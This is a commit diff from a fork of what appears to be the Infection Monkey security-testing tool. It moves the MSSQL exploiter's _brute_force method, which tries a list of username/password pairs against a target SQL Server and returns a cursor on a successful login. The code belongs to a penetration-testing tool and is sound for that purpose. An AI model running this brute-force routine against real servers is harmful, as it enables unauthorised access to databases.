forked from p15670423/monkey
Agent: Move _brute_force()
This commit is contained in:
parent
04460e1d44
commit
339619cc56
|
@ -89,6 +89,64 @@ class MSSQLExploiter(HostExploiter):
|
|||
self.exploit_result.propagation_success = True
|
||||
return self.exploit_result
|
||||
|
||||
def _brute_force(self, host, port, users_passwords_pairs_list):
|
||||
"""
|
||||
Starts the brute force connection attempts and if needed then init the payload process.
|
||||
Main loop starts here.
|
||||
|
||||
Args:
|
||||
host (str): Host ip address
|
||||
port (str): Tcp port that the host listens to
|
||||
users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce
|
||||
with
|
||||
|
||||
Return:
|
||||
True or False depends if the whole bruteforce and attack process was completed
|
||||
successfully or not
|
||||
"""
|
||||
# Main loop
|
||||
# Iterates on users list
|
||||
credentials_iterator = interruptible_iter(
|
||||
users_passwords_pairs_list,
|
||||
self.interrupt,
|
||||
"MSSQL exploiter has been interrupted",
|
||||
logging.INFO,
|
||||
)
|
||||
|
||||
for user, password in credentials_iterator:
|
||||
try:
|
||||
# Core steps
|
||||
# Trying to connect
|
||||
conn = pymssql.connect(
|
||||
host,
|
||||
user,
|
||||
password,
|
||||
port=port,
|
||||
login_timeout=self.LOGIN_TIMEOUT,
|
||||
timeout=self.QUERY_TIMEOUT,
|
||||
)
|
||||
logger.info(
|
||||
f"Successfully connected to host: {host} using user: {user} and password"
|
||||
)
|
||||
self.exploit_result.exploitation_success = True
|
||||
self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
|
||||
self.report_login_attempt(True, user, password)
|
||||
cursor = conn.cursor()
|
||||
return cursor
|
||||
except pymssql.OperationalError as err:
|
||||
logger.info(f"Connection to MSSQL failed: {err}")
|
||||
self.report_login_attempt(False, user, password)
|
||||
# Combo didn't work, hopping to the next one
|
||||
pass
|
||||
|
||||
logger.warning(
|
||||
"No user/password combo was able to connect to host: {0}:{1}, "
|
||||
"aborting brute force".format(host, port)
|
||||
)
|
||||
raise FailedExploitationError(
|
||||
"Bruteforce process failed on host: {0}".format(self.host.ip_addr)
|
||||
)
|
||||
|
||||
def _create_temp_dir(self):
|
||||
logger.debug(f"Creating a temporary directory: {MSSQLExploiter.TMP_DIR_PATH}")
|
||||
|
||||
|
@ -153,61 +211,3 @@ class MSSQLExploiter(HostExploiter):
|
|||
def _stop_monkey_server(http_thread):
|
||||
http_thread.stop()
|
||||
http_thread.join(LONG_REQUEST_TIMEOUT)
|
||||
|
||||
def _brute_force(self, host, port, users_passwords_pairs_list):
|
||||
"""
|
||||
Starts the brute force connection attempts and if needed then init the payload process.
|
||||
Main loop starts here.
|
||||
|
||||
Args:
|
||||
host (str): Host ip address
|
||||
port (str): Tcp port that the host listens to
|
||||
users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce
|
||||
with
|
||||
|
||||
Return:
|
||||
True or False depends if the whole bruteforce and attack process was completed
|
||||
successfully or not
|
||||
"""
|
||||
# Main loop
|
||||
# Iterates on users list
|
||||
credentials_iterator = interruptible_iter(
|
||||
users_passwords_pairs_list,
|
||||
self.interrupt,
|
||||
"MSSQL exploiter has been interrupted",
|
||||
logging.INFO,
|
||||
)
|
||||
|
||||
for user, password in credentials_iterator:
|
||||
try:
|
||||
# Core steps
|
||||
# Trying to connect
|
||||
conn = pymssql.connect(
|
||||
host,
|
||||
user,
|
||||
password,
|
||||
port=port,
|
||||
login_timeout=self.LOGIN_TIMEOUT,
|
||||
timeout=self.QUERY_TIMEOUT,
|
||||
)
|
||||
logger.info(
|
||||
f"Successfully connected to host: {host} using user: {user} and password"
|
||||
)
|
||||
self.exploit_result.exploitation_success = True
|
||||
self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
|
||||
self.report_login_attempt(True, user, password)
|
||||
cursor = conn.cursor()
|
||||
return cursor
|
||||
except pymssql.OperationalError as err:
|
||||
logger.info(f"Connection to MSSQL failed: {err}")
|
||||
self.report_login_attempt(False, user, password)
|
||||
# Combo didn't work, hopping to the next one
|
||||
pass
|
||||
|
||||
logger.warning(
|
||||
"No user/password combo was able to connect to host: {0}:{1}, "
|
||||
"aborting brute force".format(host, port)
|
||||
)
|
||||
raise FailedExploitationError(
|
||||
"Bruteforce process failed on host: {0}".format(self.host.ip_addr)
|
||||
)
|
||||
|
|
Loading…
Reference in New Issue